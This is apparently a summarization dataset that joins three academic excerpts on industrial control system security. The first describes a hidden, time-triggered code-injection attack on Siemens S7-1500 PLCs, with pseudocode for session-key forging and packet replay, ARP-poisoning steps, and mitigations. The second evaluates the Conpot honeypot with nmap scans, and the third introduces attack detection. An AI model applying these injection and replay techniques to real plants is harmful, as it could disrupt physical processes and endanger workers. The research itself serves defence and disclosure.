session, whilst the Source Code attribute could be substituted with another attribute from a different session i.e., from a pre-recorded session. All the captured packets containing the attributes of the ProgramCy- cleOB for both the user and attacker programs are presented in the Appendix. Step 4. Pushing the crafted message to the PLC: The crafted S7CommPlus download message contains the following at- tributes: the Object MAC and Object Code attributes of the attacker s program, and the Source Code attribute of the user program. As S7CommPlusV3 exchanges a shared session key between the TIA Portal and the PLC to prevent performing replay attacks, we rst need to bundle the packet with a correct key before we push the crafted message to the PLC. However, exploiting the shared key is out of the scoop of this paper, but it is explained in details in [30]. Once the malicious key exchange is completed, we can easily bundle the key byte- codes with our crafted message. Taking into consideration the appropriate modi cation to the session ID and the integrity elds, we store the nal S7 message (the attacker s message) in a pcap le for pushing it back to the PLC as a replay attack. Algorithm 1 describes the main core of our PLCinjector tool that we use to patch the PLC with the attacker s download message. 156 VOLUME 3, 2022 The PLCinjector tool has two functions. The rst one is utilized to exploit the integrity protection session key that S7CommPLusV3 uses. The session key exchanged in each session between the TIA Portal and S7-1500 PLCs originates from combining 16 bytes of the PLC s ServerSessionChal- lange , precisely the ones located between the bytes 2 and 18, with a random 24-byte KDK that the TIA Portal chooses. Afterwards, a ngerprinting function f( )is used within the sessionKey calculation. Line 5 generates a 24 bytes random quantity ( M), and maps it to the elliptic curve s domain do- nated as PreKey . From the random point PreKey ,w eu s ea Key Derivation Function (KDF) to derive 3-16 bytes quantities identi ed as follows: Key Encryption Key (KEK), Checksum Seed (CS) and Checksum Encryption Key (CEK) . In line 7, theCSgenerates 4096 pseudo-random bytes organized as four 256-word, namely LUT.T h i s LUT is used to calculate a checksum over the KDK andPLC_Challenge . Lines from 8 to 13 depict the elliptic curve key exchange method similar to the one that the TIA Portal uses to encrypt the random generated PreKey . After that, we mask the elliptic curve cal- culations with 20 bytes chosen randomly (donated to xin the algorithm). Line 19 provides an authenticated encryption for the encrypted KDK . Here a non-cryptographic checksum is computed, then encrypted by AES-ECP function. Finally, we add 2 header elds including key ngerprints i.e., 8-byte trun- cated SHA256 hashes of the relevant key with some additional ags see line 20. After establishing a successful session with the victim, the PLC exchanges the malicious generated Session_Key with the attacker machine along the current communicating session. In the next step, our tool executes function 2 to send the attacker s crafted S7 message that contains both the malicious code combined with the generated Session_Key . Our attacking tool can be also used against all the S7-1500 PLCs sharing the same rmware. This is due to the fact that Siemens has designed its new S7 key exchange mechanism assuming that all devices running the same rmware version use also the same public-private key pair mechanism [30]. After a successful injection, the PLC updates its program, processing the Object Code of the attacker s program while it saves the Source Code of the user s program in its mem- ory. Therefore, whenever the user uploads the program from the infected PLC, the TIA Portal will recall, decompile, and display the original program. This kept our injection hidden inside the PLC and the user could not detect any difference between the online and of ine programs. 2) CASE_2: ACTIVE S7 SESSION In this scenario, there is an ongoing active S7 session between the legitimate TIA Portal and the PLC during the patch. As the S7 PLC, by default, allows only one active online session, an attacker is not able to communicate with the PLC. It will immediately refuse any attempt to establish a connection as it is already communicating with the user. For such a scenario, the attacker needs rst to close the current online sessionAlgorithm 1: PLCinjector Tool. Function 1 Get_Session_Key (( ServerSessionChallenge )) 1: Checksum =0 2: PLC_Challenge =ServerSessionChallenge [2:18] 3: KDK=prng (24) 4: Session_Key =HMAC-SHA256 ( f(Challenge ,8)) [:24] 5: PreKey =M(prng(24)) 6: KEK,CEK,CS =KDF (PreKey) 7: LUT[4][256] =hash-init (CS) 8: while point== do 9: x=prng(20) 10: point=fx(G, y, Nonce) 11: EG2=y(point) 12: end while 13: EG1=add(s,PreKey ) 14: forblock in E( KDK )do 15: Checksum =hash (checksum) block, LUT[4][256] 16: end for 17: Checksum[12] =Checksum[12] 40 18: nal_Checksum =hash (Checksum, LUT[4][256] ) 19: key =AES-ECB ( nal_Checksum) 20: KEY =SHA256(key[:24] || DERIVE [:8]) 21: Return KEY END Function 1 Function 2 Replay (pcap le, Ethernet_interface, SrcIP, SrcPort) 22: RecvSeqNum =0 23: SYN =TRUE 24: forpkt in rdpcap (Pcap le) do 25: IP =packet [IP] 26: TCP =packet[TCP] 27: delete IP.checksum 28: IP.src =SrcIP 29: IP.Port =SrcPort 30: ifTCP. ags ==Ack or TCP. ags == RSTACK then 31: TCP.ack =RecvSeqNum+1 32: ifsendp(packet, iface=Ethernet_interface) then 33: SYN =False 34: Continue 35: end if 36: end if 37: Recv =Srp1(packet, iface =Ethernet_interface) 38: RecvSeqNum =rcv[TCP].seq 39: end for END Function 2 between the legitimate user and the PLC, before patching his malicious code. A user can establish an online session with an S7 PLC by enabling the go online feature in the TIA Portal software. Then he can control, monitor, diagnose, download, upload, VOLUME 3, 2022 157 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE start, and stop the CPU remotely. Once the user has estab- lished an online connection with the PLC, the two parties (the TIA Portal and PLC) start exchanging a speci c mes- sage along the session regularly. This message is known as S7-ACK , and in charge of keeping the session alive. The TIA Portal must always respond to any S7-ACK request sent by the PLC with a S7-ACK replay message. Therefore, for closing the current online session we run our MITM station (presented in [3]) that allows us to intercept and drop all packets sent from the TIA Portal, by performing the well-known ARP poisoning approach. If the PLC does not receive a response from the TIA Portal right after sending an acknowledgment request, it will close the connection with the connected TIA Portal and both go of ine. Fig. 11 describes this scenario. It is worth mentioning that, an attacker can also use dif- ferent ways to close the connection e.g., port stealing, replay attack with go of ine packets, etc. After both the legitimate TIA Portal and the victim PLC turned of ine, the attacker can easily establish a new session with the PLC, using his own TIA Portal. Then he patches the victim device following the same four steps explained in the previous case. For this scenario, our patching approach has limitations. The legitimate TIA Portal was forced to close the session with the PLC. Meaning that, the user can see obviously that he lost the connection with the remote device. In case he attempts to re-connect to the PLC while it is connected to the attacker s TIA Portal, the PLC will refuse his connection request. Our investigations showed that there is no way to re-connect the legitimate TIA Portal to the victim PLC after patching the PLC, unless the ICS operator himself enables go online on his TIA Portal. This abnormal disconnection between the two parties is the only effect of our patch in this scenario. B. ATTACK PHASE After a successful injection, the attacker goes of ine and closes the current communication session with the target PLC. With the next execution cycle, the attacker s program will be executed in the PLC. Meaning that, the interrupt condition of the malicious interrupt block OB10 will be checked in each execution cycle. This block remains in idle mode, and hidden in the PLC s memory as long as the interrupt condition is not met. Once the con gured date and time of the attack matches the date and time of the CPU, the interrupt code will be acti- vated i.e., the execution process of the main program (OB1) is suspended, and the CPU jumps to execute all the instructions that the attacker programmed OB10 with. In our application example, we programmed the OB10 to force certain motors to turn off at a certain time and date when we are completely disconnected from the target s network. VI. EVALUATION, DISCUSSION, AND MITIGATION In this section, we present the implementation of our attack approach, and assess the service disruption of the physical process due to our patch. Afterwards, we discuss our results and suggest possible mitigation methods to protect systems from such a threat.A. LAB SETUP For evaluating our attack approach, we used the Fischertech- nik training factory shown in Fig. 12. It consists of industrial modules such as storage and retrieval stations, vacuum suction grippers, high-bay warehouse, multi-processing station with kiln, a sorting section with color detection, an environment sensor and a pivoting camera. The entire factory is controlled by a SIMATIC S7-1512SP with a rmware V2.9.2, and pro- grammed by TIA Portal V16. The PLC connects to a TXT controller via an IoT gateway. The TXT controller serves as a Message Queuing Telemetry Transport (MQTT) broker and an interface to the schertechnik cloud. The factory we used in our experiment provides two in- dustrial processes. Storing and ordering materials. The default process cycle begins with storing and identifying the material i.e., workpiece. The factory has an integrated NFC tag sensor storing production data that can be read out via an RFID NFC module. This allows the user to trace the workpieces digitally. The cloud displays the part s colour and its ID-number. Af- terwards, the vacuum gripper places suction on the material and transports it to the high bay warehouse which applies a rst-in rst-out principle for the outsourcing. All goods that were stored could be ordered again online using a dashboard. The desired product and the corresponding color are selected by the user, and then placed in the shopping cart. The suction gripper passes the workpiece from one step to the next, and then moves back to the sorting system once the production is complete. The sorting system receives the allocation com- mand as soon as the color sorter detects the proper color. The material is sorted using pneumatic cylinders. Finally the production data is written on the material at the end of the production process, and the nished product will be provided for collection. B. IMPLEMENTATION In our experiment, we found that the vacuum suction gripper (VGR) is involved in all the industrial processes that the Fis- chertechnik system operates. Therefore, if we could disrupt its functionality, then the entire system would be impacted. The VGR module moves with the help of 8 mini motors: vertical motor up (%Q2.0), vertical motor down (%Q2.1), hor- izontal motor backwards (%Q2.2), horizontal motor forwards (%Q2.3), turn motor clockwise (%Q2.4), turn motor anti- clockwise (%Q2.5), compressor (%Q2.6), and valve vacuum (%Q2.7). Therefore, for exploiting the VGR, we programmed our OB10 to force all the 8 motors to switch off at the point zero for the attack as shown in Fig. 13. After patching the PLC with our malicious block, and be- fore the Time-of-Date interrupt being activated, we did not record any physical impact and the Fischertechnik system keeps operating normally. Once the CPU clock matches the attack time that we set, we noticed that the VGR module stopped moving. Furthermore, the workpiece that is being transported by the gripper has fallen down, as the compressor, which provides the appropriate air ow to carry the good, 158 VOLUME 3, 2022 FIG. 14. Boxplot presenting the measured execution cycle times of OB1. was turned off. This led to an incorrect operation, and the movement sequence of the workpieces was disrupted. For a real-world heavy factory e.g. automobile manufacturing in- dustry, such an attack scenario might be seriously dangerous and even cost human lives. C. EVALUATION To assess the impact of our patch on the physical process controlled by the infected device accurately, we measured and analyzed the differences of the execution cycle times for the control logic program that the PLC runs in three different scenarios:rNormal Operation: before patching the PLC as a base- line.rIdle Attack: after patching the PLC and before the in- terrupt is being activated i.e., the PLC is running the attacker s program.rActivated Attack: after the interrupt is being executed. Siemens PLCs, by default, store the time of the last execution cycle in local variable of OB1 called OB1_PREV_CYCLE . Therefore, we added a small SCL code snippet to our control program which stores the last cycle time in a separate data block. Then we recorded 4096 execution cy- cle times for each scenario, calculated the arithmetic median value, and used the Kruskal-Wallis and the Dunn s Multiple Comparison test for statistical analysis. All the results are presented as boxplots in Fig. 14. In order to make our resulting boxplots clearer and easier to read, we de ne the following parameters: 1) First quartile (Q1): represents the middle value (cycle time) between the smallest value and the median of the total recorded values (4096 execution cycle times). 2) Median (Q2): represents the middle value of the total recorded values. 3) Third quartile (Q3): represents the middle value be- tween the highest value and the median of the total values recorded. 4) Interquartile Range (IQR): represents all the values be- tween 25% to 75% of the total recorded values. 5) Maximum: represents Q3 + 1.5*IQR 6) Minimum: represents Q1 - 1.5*IQR7) Outliers: represents all the values that they are higher and lower than the maximum and minimum values re- spectively. Our measurements show that the calculated median value (Q2) of executing the OB1 for the infected program is approx. 38 ms, and differs slightly from the median value of executing the OB1 for the original program which is almost 36 ms. The Q1, and Q3 values for the infected program are as high as 36 ms and 40 ms respectively. They are a bit higher compared to the recorded ones for the original program i.e., 35 ms and 37 ms for Q1 and Q3 respectively. Meaning that, checking the interrupt condition of our malicious block in each execu- tion cycle does not disrupt executing the control logic, and the Fischertechnik system keeps operating normally. Please note that, executing the attacker s program should not exceed the overall maximum execution time of 150 ms. Our mea- surements clearly show that our injection did not trigger this timeout as we recorded a maximum value as high as 47 ms which is still quite small compared to 150 ms. Once the CPU s date and time match the date and time that we set to trigger our attack, the CPU jumps to execute the malicious instruction existing in OB10, and the attack is activated. Our measurements, for this scenario, did not record any higher median values in the execution cycles compared to the prior scenario i.e., when the attack is idle. This is because we set the OB10 to occur only once, so the PLC processes the instructions existing in OB10, and resumes executing OB1 from the last point before the interrupt. But it keeps checking the condition of the interrupt in each cycle as long as OB10 is existing in the control logic program. However, our approach allows attackers to adjust the repeating of the interrupt (see Section III), as well as to program the interrupt block on their will causing different impacts in the physical process of the target system. D. DISCUSSION Based on our analysis, we can conclude that when our patch is in idle mode, the execution cycle times of the infected program are almost as high as the execution times of the orig- inal program. Therefore, the ICS operator would not record any abnormality in executing the control logic as the TIA Portal software will not report any differences before and after the patch. Furthermore, our attack approach always shows VOLUME 3, 2022 159 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE the original program to the ICS operator, despite the PLC is running a different one. This is due to the fact that the original Source Code attribute is always sent back to the TIA Portal whenever the user requires the program from the infected PLC. Due to all that, our attack is capable of staying in the device in idle mode for a long time without being revealed, and the only way to remove it is to re-program the device once again by the ICS Operator. However, in critical facilities and power plants, re-programming the PLCs is not a common case unless there is a certain reason to do so. The success of our attack approach on S7-1500 PLCs is, indeed, based on serious design vulnerabilities in the newest model of S7 PLCs and security issues in the integrity mecha- nism used in the latest version of the S7CommPlus protocol. We found that the PLC does not authenticate the TIA Portal as we expected, and only con rms the session freshness. This allows an external attacker to perform replay attacks against the PLC, keeping in mind that he has always to provide the correct Session_Key in his crafted S7 messages, otherwise the PLC will detect that the expected S7 message received has been modi ed and will refuse to update its program. Siemens claimed that the newest PLCs are resilient against replay attacks, but unfortunately we could maliciously update the PLC s program by sending a crafted S7 download message. Another vulnerability we detected during our investigations is that there is no security pairing between the TIA Portal and the PLC i.e., the PLC does not ensure that the TIA Portal it is currently-communicating with, is the same TIA Portal than in a previous session. This allows an attacker who has a TIA Portal installed on his machine to easily access the PLC without any efforts. Although this holds true as long as the target PLC is not already connected online to the legitimate TIA Portal. Our results showed that an attacker can still com- municate and inject the victim after closing the current session between the TIA Portal and the PLC. It is also noticed that Siemens provides its 1500 CPUs with a sophisticated integrity checking algorithm which checks the validity of any S7 mes- sage received. But unfortunately, this does not hold true for the entire ProgramCycleOB Object. Meaning that, the CPU checks only the integrity of the Object MAC and the Object Code , and has no integrity check for the Source Code . So, if an attacker replaces the Source Code from another session with a new one, the PLC will authenticate the download message and run the attacker s program. This is a signi cant security gap in the design of the integrity mechanism for S7-1500 PLCs, as it keeps the injection hidden inside the memory. E. MITIGATION The fundamental solution would be completely redesigning the integrity check mechanism that the newest S7 PLCs use. The new mechanism should include a security pairing and mutual authentication between the PLC and TIA Portal. But we are aware of the fact that such a solution would also incur an extremely high cost and may have backward compatibility issues. Furthermore, ICS devices are usually not software updated on time, and have a very long life-cycle comparedto common IT devices. For all that, we should expect that insecure devices will keep employed in real-world ICS envi- ronments for a long time. In this term, network detection can be seamlessly integrated into the existing ICS setting. In par- ticular, control logic detection [36], and veri cation [41], [42] can be utilized to alleviate current situation. As our injection was hidden in the PLC memory, so partitioning the memory space and enforcing memory access control [37] could also be a reasonable solution. Other suggestions include employ- ing standard cryptography methods such as digital signatures (for messages like control logic manipulation), but also us- ing network monitoring tools like snort [38], ArpAlert [39], and ArpWatchNG [40] for revealing any attack involving MITM attacks. Furthermore, a mechanism to check the pro- tocol header which contains information about the type of the payload is also recommended as a solution to detect and block any potential unauthorized transfer of the control logic. However, from our perspective the best solution to prevent injection attacks is to separate the information technology (IT) domain from operational technology networks by using a Demilitarized Zone (DMZ). VII. CONCLUSION This paper presented a new threat on the newest SIMATIC PLCs. Our attack approach is based on injecting the attacker s malicious code once he gains access to the target s network, but activating his patch later without a need to be connected at the time of the attack. Our investigation identi ed a few design vulnerabilities in the new integrity method that the S7-1500 PLCs use. Based on our ndings, we managed successfully to conduct an injection attack, by patching the tested PLC with a Time-of-Day interrupt block (OB10). This block allows us to activate our patch, and to confuse the physical process without being connected to the victim at the point zero for the attack. We analyzed and evaluated the possibility of revealing our in- jection by the ICS operator. Our experimental results showed that the original control logic program is always shown to the user, whilst the PLC runs the attacker s program. In addition, our injection does not increase the execution times of the control logic. Hence, the physical process is not impacted when our patch is in idle mode. To summarize, our attack is a very serious threat targeting ICSs, as attackers need to be only online during the patch and can close all the connections to the target s network afterwards. Therefore, they will not be detected even if the ICS operators re-activate the security mea- sure. Finally, we provided some recommendations to secure ICSs from such a severe threat. Our attack approach is feasible for all S7-1500 PLCs with a rmware 2.9.2 or lower. However, Siemens updated the rmware for all S7-1500 CPUs in December, 2021 to the newer version 2.9.4. Therefore, a further investigation is re- quired to test the security of the latest rmware version. Fur- thermore, a deeper analyzes of the advanced S7CommPlus protocol aiming at understanding the private key mechanism that PLCs implement can be also be a part of future works. We believe that, if attackers manage successfully to extract the 160 VOLUME 3, 2022 private key from an S7-1500 PLC, then stronger attacks e.g., fully man in the middle, session-hijacking, and impersonation PLC attacks might become possible for the entire products line. VII. APPENDIX. PACKETS CAPTURE FIG. 15. Object MAC Attribute - User Program. FIG. 16. Object Code Attribute - User Program. FIG. 17. Source Code Attribute - User Program. FIG. 18. Object MAC Attribute - Attacker Program. FIG. 19. Object Code Attribute - Attacker Program. FIG. 20. Source Code Attribute - Attacker Program.
Summary:
Programmable Logic Controllers (PLCs) are increasingly connected and integrated into the Industrial Internet of Things (IIoT) for a better network connectivity and a more streamlined control process. But in fact, this brings also its security challenges and exposes them to various cyber-attacks targeting the physical process controlled by such devices. In this work, we investigate whether the newest S7 PLCs are vulnerable by design and can be exploited. In contrast to the typical control logic injection attacks existing in the research community, which require from adversaries to be online along the ongoing attack, this article introduces a new exploit strategy that aims at disrupting the physical process controlled by the infected PLC when adversaries are not connected neither to the target nor to its network at the point zero for the attack. Our exploit approach is comprised of two steps: 1) Patching the PLC with a malicious Time-of-Day interrupt block once an attacker gains access to an exposed PLC, 2) Triggering the interrupt at a later time on the attacker will, when he is disconnected to the system s network. For a real attack scenario, we implemented our attack approach on a Fischertechnik training system based on S7-1500 PLC using the latest version of S7CommPlus protocol. Our experimental results showed that we could keep the patched interrupt block in idle mode and hidden in the PLC memory for a long time without being revealed before being activated at the speci c date and time that the attacker de ned. Finally, we suggested some potential security recommendations to protect industrial environments from such a threat.
|
Summarize:
Keywords Supervisory Control and Data Acquisition systems, honeypots, Conpot, network security I. INTRODUCTION In a world where the value of information is ever increasing, hackers are consiste ntly targeting governments, corporations, and individuals to obtain valuable secrets, proprietary data, and personally identifiable information (PII). Honeypots can be used to better understand the landscape of where these attacks are orig inating. Honeypots can be leveraged not only to conduct research on threats in the wild, but also to notify an organization if a potential threat is within one s network. Supervisory Control and Data Acquisition (SCADA) systems are a critical ta rget, and with the advent of SCADA honeypots, attempts to access or tamper with SCADA devices can be preemptively identified and analyzed. A. Background SCADA Honeypots attempt to mimic an active SCADA system. A typical SCAD A system is composed of four parts: a central computer (host), a number of field-based remote measurement and control units known as Remote Terminal Units (RTUs), a wide area telecommunications system to connect them, and an operator interface to allow the operator to access the system [1]. Conpot is a low-interactive SCADA honeypot and serves the purpose of being extremely easy to implement. Serbanescu et al., for example, found th at Conpot would support the simulation of hypertext transfer protocol (HTTP), Modbus (a serial communication protocol), and Simple Network Management Protocol (SNMP; used for network management), and the integration of programmable logic controllers (PLC) [2]. The Co npot project by The Honeynet Project was released in May 2013. Conpot utilizes a logging system to monitor any changes th at are made by intruders. The honeypot logs events of HTTP, SNMP and Modbus services with millisecond accuracy an d offers basic tracking information such as source address, request type, and resource requested in the case of HTTP [3]. B. Research Gap In a literature review of SCADA honeypots, a gap was identified regarding the analysis of the effectiveness of the various honeypots. Studies were found that detailed the interactions occurring with a given honeypot, i.e., Digital Bond Honeynet and Conpot; however, studies of the actual effectiveness of any given honeypot have not been conducted. The closest approach to this fi eld of study was carried out by Fronimos, et. al., whose study focused on evaluating the usability and performance of Low Interaction Honypots, but did not examine the specifics of SCADA honeypot efficacy [4]. A more detailed look at the efficacy of SCADA honeypots that takes into account their uniq ue requirements has not been conducted prior to this res earch. This paper performs a detailed evaluation of the Conpot SCADA Honeypot. II.E XPERIMENT APPROACH To conduct a full analysis of the SCADA honeypot Conpot, a virtualized image was created and used in multiple Amazon Web Services (AWS) zones. The SCADA honeypots ran from March 25 th to April 11th and the logs were subsequently analyzed. An additional log set was pulled April 27 th for further analysis. The following section outlines the steps for setup and process for creating instances of Conpot. Installation of Conpot is quite simple; however, certain dependencies are necessary for it to fully function. Due to the age of some of the required p ackages, repositories must be manually added. Ubuntu 12.04, an open source software platform used for various mobile and other devices, was used as the base operating system for a micro-instance within AWS, after configuring basic se ttings and conducting updates. A. Experiment Setup After successfully obtaining th e Conpot start screen, the AWS micro-instance was shut down so that an image could be created. Utilizing the Create Image function within AWS, the image was then added to the Images AMI folder for deployment. This image was then propagated to additional AWS deployment zones. After deploying the image twice in each zone (see Table I), the SCADA honeypots were booted and accessed via SSH to finalize their deployment. This material is based upon work sup ported by the U.S. National Science Foundation under Grant No. DUE-1303362 and SES-1314631. 978-1-5090-3865-7/16/$31.00 2016 IEEE 196 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:48 UTC from IEEE Xplore. Restrictions apply. An advantage to leveraging AWS is its key management and port security options. Each instance of the Conpot was set up to allow all ports to be accessible and to provide an accurate review of port inform ation when running any given honeypot template. Furthermore, the key pair options facilitated maintaining secure access to each instance. After obtaining the private key necessary to create a connection, each instance was generated using the same public key which allowed access using one private certificate combined with the instance password. After accessing each honeypot, the following command was utilized to start the Conpot with the designated template: sudo conpot --template [template name] If a template name is not selected, the default option of default is used. For the purpo ses of the honeypot analysis, an in-depth review of both the Guardian AST gas pump monitoring system and default Siemens S7-200 ICS was performed together with a brief analysis of the IPMI - 371 and Kamstrup 382 smart meter SCADA devices. B. AWS Deployment The following table summarizes the deployed Conpot honeypots by their location, IP address, and template details. The honeypots were deployed globally across AWS for future analysis into regional variations on attack frequency and type: TABLE I. AWS CONPOT DEPLOYMENT ZONE INFORMATION AWS Location Name IP Details us-east-1a Conpot1 52.23.225.126 Default template us-east-1a Conpot2 54.86.249.160 Emulation of gas tank level us-west-2b Conpot3 52.36.62.44 Default template us-west-2b Conpot4 52.32.45.32 Em ulation of gas tank level eu-west-1b Conpot5 52.30.167.154 Default template eu-west-1b Conpot6 52.19.95.69 Emulation of gas tank level ap-northeast-1c Conpot7 52.192.20.179 Default template ap-northeast-1c Conpot8 52.196.47.205 Emulation of gas tank level ap-southeast-1b Conpot9 54.254.141.38 Default template ap-southeast-1b Conpot10 54.254.140. 52 Emulation of gas tank level sa-east-1a Conpot11 54.207.96.59 Default template sa-east-1a Conpot12 54.232.248.38 Emulation of gas tank level III. DATA AND RESULTS A. Nmap Scan Data The security scanner Nmap was utilized to check the open ports after starting Conpot. Nmap was chosen as it is a mature, robust connection-oriented canning tool that is widely used and has broad support for many protocols. For initial comparison, a vanilla installation of Ubuntu was also deployed and scanned to show what ports are open by default. The following Nmap scanni ng commands were used: nmap -A -v [IP Address] nmap -A -v -Pn [IP Address] nmap -A -v -Pn -p- [IP Address] Nmap was used in a staged approach to show what different scanning techniques showed as the open port results (Tables II and III). The flag -A results in Nmap turning on version detection and other Advanced and Aggressive features (nmap.org). This scanning technique is intrusive and readily detected due to its aggr essive scanning and operation systems (OS) detection, but it provides a good representation of what to expect for identification. Using the -Pn resulted in Nmap suppressing pings when conducting scans to determine if a host is up. For the purposes of the analysis, the virtual machines were already known to be operational and in some cases their configurations reject ed pings. The -p- flag was also used to conduct a scan over the entire port range (ports 1-65535). Lastly, the flag -v (version detection) was used also, although it was later deemed not necessary, as the A flag already included version detection. TABLE II. N MAP SCANNING (UTILIZING FLAGS V AND A) Honeypot Type Result Ports Opened by Conpot Siemens S7-200 22, 80 80,102, 161, 502, 623, 47808 Guardian AST N/A 10001 IPMI N/A 623 Kampstrup Smart Meter N/A 1025, 50100 Scanning with the -v and -A flags resulted in no results from the Guardian AST, IPMI , and Kampstrup smart meter, due to pings being rejected by these SCADA configurations. The revelation of port 22 through a ping scan should allow an attacker to question whether the Siemens S7-200 emulator is a honeypot or an actual SCADA device. TABLE III. NMAP SCANNING (UTILIZING V, -A, AND -PN FLAGS ) Honeypot Type Result Ports Opened by Conpot Siemens S7-200 22, 25, 80, 514, 6009, 8443 80,102, 161, 502, 623, 47808 Guardian AST 22, 25, 514, 6004, 10001 10001 IPMI 22 623 Kampstrup Smart Meter 22, 25, 514, 1025, 1068 1025, 50100 After utilizing the -Pn flag to stop the ping option during scans, many more ports were identified across the various usable templates within Conpot. However most of these additional ports were not SCADA ports; for example, port 514 was for system logging, while many of the opened SCADA ports remained undetected. This indicates that Conpot installations running on Ubuntu appear to be very susceptible to having Ubuntu default services enabled and running across a multitude of ports that would not be available on a standard SCADA installation. As a final scan to compare against, all ports were scanned to determine what a full Nmap sc an would show as open port results (Table IV). On average the scans took around three to four hours to fully process due to the intensity of the scans. The wide range of additional open ports, including ports in the dynamic/private range of 49152-65536 (note: The Kampstrup Smart Meter statically assigns a port in this range) again calls into question the ability of a default Conpot installation that 197 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:48 UTC from IEEE Xplore. Restrictions apply. does not actively close all other port-opening Ubuntu services to masquerade as an actual SCADA device, if comprehensive port scanning is utilized, or even if repositories such as Shodan are. TABLE IV. N MAP SCANNING (UTILIZING V, A, PN, AND -P- FLAGS ) Honeypot Type Result Ports Opened by Conpot Siemens S7-200 22, 80, 102, 502, 514, 2000, 5060, 8008, 8020, 18556 80,102, 161, 502, 623, 47808 Guardian AST 22, 514, 2000, 3826, 5060, 8008, 8020, 10001, 11190, 19116, 36123, 43787, 48191, 63790 10001 IPMI 22, 2000, 5060, 8008, 8020 623 Kampstrup Smart Meter 22, 514, 1025, 2000, 4368, 5060, 8008, 32469, 50100, 52245, 57565 1025, 50100 Vanilla Ubuntu Install 22, 514, 2000, 5060, 8008, 8020, 38051, 38093, 47785 B. SHODAN Scan Data SHODAN data was also anal yzed to determine which ports it detected as open within the various Conpot templates. Shodan regularly scans the entire IPV4 internet address space and as such is a reliable indicator of what can be seen by third parties conducting reconnaissance scanning. Unfortunately, the IPMI and Kampstrup templates were never identified by SHODAN due to time constraints. TABLE V. SHODAN SCAN DATA RESULTS Honeypot Type SHODAN Port Scan Results Conpot Ports Siemens S7-200 22, 80, 102, 161 80,102, 161, 502, 623, 47808 Guardian AST 10001 10001 IPMI N/A 623 Kampstrup Smart Meter N/A 1025, 50100 C. Scan Data Discussion A very interesting finding in the Nmap scan data is that while the Guardian AST, Kampstrup, and IPMI devices all denied pings, the Siemens SIAMATIC S7-200 did not. When removing the ping option for the result set in Table III, the results were more comprehensive and revealing. In every scan result, port 22 was shown as open, which would be the case due to utilizing SSH to gain access to each honeypot via a terminal in Putty. When comparing what should have been seen as open ports for each respective template within Conpot to the results from Table III, Nmap failed to identify the following ports as open on their respective devices: Siemens S7-200: 102, 161, 502, 623, 47808 IPMI: 623 Kampstrup Smart Meter: 50100 However, these ports may not have been found due to not being part of the top 1,000 which Nmap commonly scans without being directed to scan each and every port. To that point, Nmap was eventually set to scan each and every port (Table IV). After scanning all ports, some ports that should have been open were still not found. The results are as follows for ports which were not found: Siemens S7-200: 161, 623, 47808 IPMI: 623 This requires further research. In the case of the Siemens device, SHODAN found port 161 and captured a banner from it, while Nmap did not detect it. What was more surprising during the full comprehensive scan was the large number of open ports that were not expected to be open at all within Table V. Due to the large variety of ports that were discovered to be open, the vanilla install of the Ubuntu image was deployed without running any Conpot template. Based on a scan of the vanilla Ubuntu, it appears that more ports were being opened than would be originally anticipated when running any given Conpot template. Further analysis will need to be conducted to determine which extra ports being opened might be indicative of a honeypot instead of an effective emulation. The results from the SHODAN scan were also very insightful in that they more accurately showed the Conpot instances as being SCADA devices . This is primarily because SHODAN focuses its scan results on a much smaller port set, which resulted in the results not showing the large number of open ports that were shown in the all-port scan of Nmap. The most intriguing finding here, as previously mentioned, is that SHODAN found port 161 open on the Siemens device, while Nmap did not. The banner grabbed by SHODAN also showed that the device was a Siemen s SIAMATIC S7-200 device. These findings may show that Nmap is indeed not fully effective in determining ports that are actually open. Unfortunately, at the time of this writing, SHODAN had not discovered the IPMI and Kampstrup devices, so a comparison of the SHODAN results of these devices with the Nmap port scans was not available. Additional future work includes evaluating the SCADA Honeynet Honeypot, analyzing SCADA honeypot attacks, and evaluating log analysis tools. Another future task, cloaking Honeypot signatures that could differentiate them from real SCADA devices then evaluating attack differentials, could help determine if honeypots are being identified. In conclusion, the devices accurately depicted SCADA ports, but appeared to have additional ports open that could reveal their identity as honeypots to sophisticated attackers. R EFERENCES [1] S. Wade. SCADA Honeynets: Th e attractiveness of honeypots as critical infrastructure security tools for the detection and analysis of advanced threats. Graduate Theses and Dissertations, Iowa State University, USA, 2011. [2] A. Serbanescu, S. Obermeir, and De r-Yeuan Yu. ICS Threat Analysis Using a Large-Scale Honeynet, in Proceedings of the 3rd International Symposium for ICS & SCADA Cyber Security Research 2015, 2015, 1-30. [3] D. Buza, F. Juhasz, and G. Miru. D esign and implementation of critical infrastructure protection system, Budapest University of Technology and Economics, Department of Netw orked Systems and Services, 2013. [4] D. Fronimos, E. Magkos, and V. Chrissikopoulos. Evaluating Low Interaction Honeypots and On their Use against Advanced Persistent Threats, in PCI '14, Proceedings of the 18th Panhellenic Conference on Informatics, Athens, Gr eece, October 2-4, 2014. 198 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:48 UTC from IEEE Xplore. Restrictions apply.
Summary:
Supervisory Control and Data Acquisition (SCADA) honeypots are key tools not only for determining threats which pertain to SCADA devi ces in the wild, but also for early detection of potential mali cious tampering within a SCADA device network. An analysis of one such SCADA honeypot, Conpot, is conducted to determine its viability as an effective SCADA emulating device. A long-term analysis is conducted and a simple scoring mechanism lev eraged to evaluate the Conpot honeypot.
|
Summarize:
I. INTRODUCTION The expansion and networking of systems in the context of Industry 4.0 and the Internet of Things is a top priority for many companies. This makes the security of IT systems more important than ever. Cyber attacks on an industrial control system (ICS) represent a real risk as ICS become more integrated into other systems. The communication between controllers and plants is increasingly being done over a network. These are potentially vulnerable to cyber attacks. The focus of this paper is the security of ICS. In particular, PLC level and process level are considered here. Many approaches consider supervisory control and data acquisition (SCADA) systems. In the context of supervisory control of discrete event systems and the detection of cyber attacks only a few approaches can be found in the literature ([1] [8]). [1] proposed a robust supervisor for attacks, in which an attacker can control the actuators to perform undesirable behavior. The supervisor ful lls its tasks in nominal operation mode and under attack. [2] proposes a method based on fault- tolerant control for a system with partially vulnerable sensors and actuators. After the detection all controllable actuators are disabled so that the system never enters an unsafe state. A similar approach is proposed in [3], where a security module determines the attacked communication channels but only the necessary actuators are deactivated. In [4], different from other approaches, no attack detection is used. 